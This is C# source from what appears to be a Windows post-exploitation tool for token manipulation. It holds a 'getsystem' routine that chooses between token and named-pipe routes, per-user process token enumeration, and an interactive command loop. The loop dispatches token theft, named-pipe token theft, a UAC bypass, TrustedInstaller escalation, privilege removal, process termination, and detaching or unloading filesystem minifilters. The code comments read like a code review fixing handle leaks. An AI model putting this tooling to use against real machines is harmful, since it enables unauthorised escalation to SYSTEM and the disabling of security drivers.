////////////////////////////////////////////////////////////////////////////////
// Dispatches a "getsystem" request: the token route is used when the supplied
// token holds SeDebugPrivilege, the named-pipe route otherwise.
// input  - remainder of the command line after the "getsystem" verb
// hToken - token whose privileges decide the route; not closed here
////////////////////////////////////////////////////////////////////////////////
public static void GetSystem(String input, IntPtr hToken)
{
    Boolean hasDebugPrivilege;
    Boolean debugPrivilegeEnabled;
    CheckPrivileges.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out hasDebugPrivilege, out debugPrivilegeEnabled);

    String verb = NextItem(ref input);
    Boolean bareRequest = ("getsystem" == verb);

    // NOTE(review): only the presence of SeDebugPrivilege is consulted; whether
    // it is currently enabled (debugPrivilegeEnabled) is ignored. Presumably
    // the Tokens route enables it itself - confirm against Tokens.GetSystem.
    if (!hasDebugPrivilege)
    {
        if (bareRequest)
        {
            NamedPipes.GetSystem();
        }
        else
        {
            NamedPipes.GetSystem(input, verb + " " + input);
        }
        return;
    }

    using (Tokens tokens = new Tokens())
    {
        if (bareRequest)
        {
            tokens.GetSystem();
        }
        else
        {
            tokens.GetSystem(verb + " " + input);
        }
    }
}
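////////////////////////////////////////////////////////////////////////////////
// Finds one process per user by walking every process token.
// findElevation - when true, only processes whose token passes
//                 CheckPrivileges.CheckElevation are considered
// Returns: user name -> id of the first process with a primary token owned by
// that user. Processes that cannot be opened or whose token cannot be read
// are skipped; only a GetTokenInformation failure is reported.
//
// Fixes relative to the previous version: the impersonation-token filter is
// now evaluated after GetTokenInformation has filled the structure (it used
// to test a freshly constructed struct and therefore never fired), and the
// process and token handles are released on every exit path of the loop.
////////////////////////////////////////////////////////////////////////////////
public static Dictionary<String, UInt32> EnumerateTokens(Boolean findElevation)
{
    Dictionary<String, UInt32> users = new Dictionary<String, UInt32>();

    foreach (Process p in Process.GetProcesses())
    {
        // NOTE(review): bInheritHandle is passed as true although the handle is
        // closed a few lines below; inheritance is not needed here.
        IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_LIMITED_INFORMATION, true, (UInt32)p.Id);
        if (IntPtr.Zero == hProcess)
        {
            continue;
        }

        IntPtr hToken;
        Boolean opened = kernel32.OpenProcessToken(hProcess, (UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken);
        // The process handle is only needed to obtain the token; release it
        // whether or not OpenProcessToken succeeded.
        kernel32.CloseHandle(hProcess);
        if (!opened)
        {
            continue;
        }

        try
        {
            if (findElevation && !CheckPrivileges.CheckElevation(hToken))
            {
                continue;
            }

            UInt32 dwLength = 0;
            Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
            // The first call with a zero length fails and reports the required
            // size in dwLength; the second call fills the structure.
            if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
            {
                if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                {
                    Console.WriteLine("GetTokenInformation: {0}", Marshal.GetLastWin32Error());
                    continue;
                }
            }

            // Only primary tokens are of interest; this must follow the
            // GetTokenInformation call that populates TokenType.
            if (Winnt.TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
            {
                continue;
            }

            String userName = String.Empty;
            if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
            {
                continue;
            }

            // Keep the first process seen for each user.
            if (!users.ContainsKey(userName))
            {
                users.Add(userName, (UInt32)p.Id);
            }
        }
        finally
        {
            kernel32.CloseHandle(hToken);
        }
    }

    return users;
}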
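////////////////////////////////////////////////////////////////////////////////
// Find processes for a user via Tokens.
// findElevation - when true, return as soon as the first elevated process
//                 owned by the user is found (that single entry, unsorted)
// userAccount   - user name compared case-insensitively (ordinal) against the
//                 token's user; a null value matches nothing
// Returns: process id -> process name, sorted by process name unless the
// early elevated return applies.
//
// Fixes relative to the previous version: the process and token handles are
// released on every exit path of the loop (they leaked whenever a process was
// skipped), the comparison no longer relies on culture-sensitive ToUpper(),
// and a null userAccount no longer throws.
////////////////////////////////////////////////////////////////////////////////
public static Dictionary<UInt32, String> EnumerateUserProcesses(Boolean findElevation, String userAccount)
{
    Dictionary<UInt32, String> users = new Dictionary<UInt32, String>();
    Process[] pids = Process.GetProcesses();
    Console.WriteLine("[*] Examining {0} processes", pids.Length);

    foreach (Process p in pids)
    {
        // NOTE(review): bInheritHandle is passed as true although the handle is
        // closed a few lines below; inheritance is not needed here.
        IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_LIMITED_INFORMATION, true, (UInt32)p.Id);
        if (IntPtr.Zero == hProcess)
        {
            continue;
        }

        IntPtr hToken;
        Boolean opened = kernel32.OpenProcessToken(hProcess, (UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken);
        // The process handle is only needed to obtain the token; release it
        // whether or not OpenProcessToken succeeded.
        kernel32.CloseHandle(hProcess);
        if (!opened)
        {
            continue;
        }

        try
        {
            if (findElevation && !CheckPrivileges.CheckElevation(hToken))
            {
                continue;
            }

            UInt32 dwLength = 0;
            Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
            // The first call with a zero length fails and reports the required
            // size in dwLength; the second call fills the structure.
            if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
            {
                if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                {
                    continue;
                }
            }

            // Only primary tokens are of interest.
            if (Winnt.TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
            {
                continue;
            }

            String userName = String.Empty;
            if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
            {
                continue;
            }

            if (String.Equals(userName, userAccount, StringComparison.OrdinalIgnoreCase))
            {
                users.Add((UInt32)p.Id, p.ProcessName);
                if (findElevation)
                {
                    // One elevated process is enough for the caller.
                    return users;
                }
            }
        }
        finally
        {
            kernel32.CloseHandle(hToken);
        }
    }

    Console.WriteLine("[*] Discovered {0} processes", users.Count);

    // Re-insert in process-name order so callers iterate a sorted table.
    Dictionary<UInt32, String> sorted = new Dictionary<UInt32, String>();
    foreach (KeyValuePair<UInt32, String> entry in users.OrderBy(u => u.Value))
    {
        sorted.Add(entry.Key, entry.Value);
    }
    return sorted;
}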
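////////////////////////////////////////////////////////////////////////////////
// Reads one command line from the console, dispatches it and reports any
// failure. Commands that accept a process id operate on that process' token;
// without one they fall back to the current process token.
//
// Fixes relative to the previous version: the current-process token handle is
// closed before it is replaced by a target token (it used to leak), the
// handle opened by "terminate" is released, the working token is released
// even when a command throws, and a process that exits between enumeration
// and printing no longer aborts the whole "sample_processes" listing.
////////////////////////////////////////////////////////////////////////////////
internal void Run()
{
    IntPtr hToken = IntPtr.Zero;
    try
    {
        Console.Write(context);
        String input = activateTabs ? console.ReadLine() : Console.ReadLine();

        IntPtr tempToken = IntPtr.Zero;
        // Default target: our own token. NOTE(review): the return value is not
        // checked; on failure hToken stays zero and the token commands fail at
        // their own call sites.
        kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out hToken);

        switch (NextItem(ref input))
        {
            case "info":
                if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken))
                {
                    ReplaceToken(ref hToken, tempToken);
                }
                Console.WriteLine("");
                CheckPrivileges.GetTokenUser(hToken);
                Console.WriteLine("");
                CheckPrivileges.GetTokenOwner(hToken);
                Console.WriteLine("");
                CheckPrivileges.GetTokenGroups(hToken);
                Console.WriteLine("");
                CheckPrivileges.GetElevationType(hToken, out _);
                CheckPrivileges.PrintElevation(hToken);
                break;
            case "list_privileges":
                if (!TryRetargetToken(input, ref hToken, ref tempToken))
                {
                    break;
                }
                Tokens.EnumerateTokenPrivileges(hToken);
                break;
            case "enable_privilege":
                if (!TryRetargetToken(input, ref hToken, ref tempToken))
                {
                    break;
                }
                Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                break;
            case "disable_privilege":
                if (!TryRetargetToken(input, ref hToken, ref tempToken))
                {
                    break;
                }
                Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
                break;
            case "remove_privilege":
                if (!TryRetargetToken(input, ref hToken, ref tempToken))
                {
                    break;
                }
                Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
                break;
            case "nuke_privileges":
                if (!TryRetargetToken(input, ref hToken, ref tempToken))
                {
                    break;
                }
                Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken);
                break;
            case "terminate":
                if (GetProcessID(input, out processID, out command))
                {
                    IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID);
                    if (IntPtr.Zero == hProcess)
                    {
                        Tokens.GetWin32Error("OpenProcess");
                        break;
                    }
                    try
                    {
                        Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
                        if (!kernel32.TerminateProcess(hProcess, 0))
                        {
                            Tokens.GetWin32Error("TerminateProcess");
                            break;
                        }
                        Console.WriteLine("[+] Process Terminated");
                    }
                    finally
                    {
                        kernel32.CloseHandle(hProcess);
                    }
                }
                break;
            case "sample_processes":
                users = Enumeration.EnumerateTokens(false);
                PrintUserTable(users);
                break;
            case "sample_processes_wmi":
                users = Enumeration.EnumerateTokensWMI();
                PrintUserTable(users);
                break;
            case "find_user_processes":
                processes = Enumeration.EnumerateUserProcesses(false, input);
                PrintProcessTable(processes);
                break;
            case "find_user_processes_wmi":
                processes = Enumeration.EnumerateUserProcessesWMI(input);
                PrintProcessTable(processes);
                break;
            case "list_filters":
                using (Filters filters = new Filters())
                {
                    filters.First();
                    filters.Next();
                }
                break;
            case "list_filter_instances":
                using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input)))
                {
                    filterInstance.First();
                    filterInstance.Next();
                }
                break;
            case "detach_filter":
                Filters.FilterDetach(input);
                break;
            case "unload_filter":
                Filters.Unload(NextItem(ref input));
                break;
            case "sessions":
                Enumeration.EnumerateInteractiveUserSessions();
                break;
            case "getsystem":
                GetSystem(input, hToken);
                break;
            case "gettrustedinstaller":
                GetTrustedInstaller(input);
                break;
            case "steal_token":
                StealToken(input);
                break;
            case "steal_pipe_token":
                StealPipeToken(input);
                break;
            case "bypassuac":
                BypassUAC(input);
                break;
            case "whoami":
                Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
                break;
            case "reverttoself":
                String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed";
                Console.WriteLine(message);
                break;
            case "run":
                Run(input);
                break;
            case "runpowershell":
                RunPowerShell(input);
                break;
            case "exit":
                Environment.Exit(0);
                break;
            case "help":
                String item = NextItem(ref input);
                if ("help" != item)
                {
                    Help(item);
                }
                else
                {
                    Help();
                }
                break;
            default:
                Help();
                break;
        }

        Console.WriteLine();
    }
    catch (Exception error)
    {
        Console.WriteLine(error.ToString());
        Tokens.GetWin32Error("MainLoop");
    }
    finally
    {
        // Release whichever token is current, even if the command threw.
        if (IntPtr.Zero != hToken)
        {
            kernel32.CloseHandle(hToken);
        }
    }
}

////////////////////////////////////////////////////////////////////////////////
// Points hToken at replacement, closing the handle it previously held so the
// original token handle does not leak when a target process is selected.
////////////////////////////////////////////////////////////////////////////////
private static void ReplaceToken(ref IntPtr hToken, IntPtr replacement)
{
    if (IntPtr.Zero != hToken && hToken != replacement)
    {
        kernel32.CloseHandle(hToken);
    }
    hToken = replacement;
}

////////////////////////////////////////////////////////////////////////////////
// Resolves the optional process id in input (populating the processID and
// command fields via GetProcessID) and swaps hToken for that process' token.
// Returns false only when a process id was supplied but its token could not
// be opened; with no process id the current token is kept and true returned.
////////////////////////////////////////////////////////////////////////////////
private Boolean TryRetargetToken(String input, ref IntPtr hToken, ref IntPtr tempToken)
{
    if (!GetProcessID(input, out processID, out command))
    {
        return true;
    }
    if (!OpenToken(processID, ref tempToken))
    {
        return false;
    }
    ReplaceToken(ref hToken, tempToken);
    return true;
}

////////////////////////////////////////////////////////////////////////////////
// Prints a user -> process id table with the current name of each process.
////////////////////////////////////////////////////////////////////////////////
private static void PrintUserTable(IDictionary<String, UInt32> table)
{
    Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
    Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
    foreach (String name in table.Keys)
    {
        Console.WriteLine("{0,-40}{1,-20}{2}", name, table[name], ProcessNameOrExited(table[name]));
    }
}

////////////////////////////////////////////////////////////////////////////////
// Name of the running process with the given id, or a placeholder when the
// process is gone: Process.GetProcessById throws for a pid that is no longer
// running, which previously aborted the whole listing.
////////////////////////////////////////////////////////////////////////////////
private static String ProcessNameOrExited(UInt32 pid)
{
    try
    {
        return Process.GetProcessById((Int32)pid).ProcessName;
    }
    catch (Exception e) when (e is ArgumentException || e is InvalidOperationException)
    {
        return "<exited>";
    }
}

////////////////////////////////////////////////////////////////////////////////
// Prints a process id -> process name table.
////////////////////////////////////////////////////////////////////////////////
private static void PrintProcessTable(IDictionary<UInt32, String> table)
{
    Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
    Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
    foreach (UInt32 pid in table.Keys)
    {
        Console.WriteLine("{0,-30}{1,-30}", pid, table[pid]);
    }
}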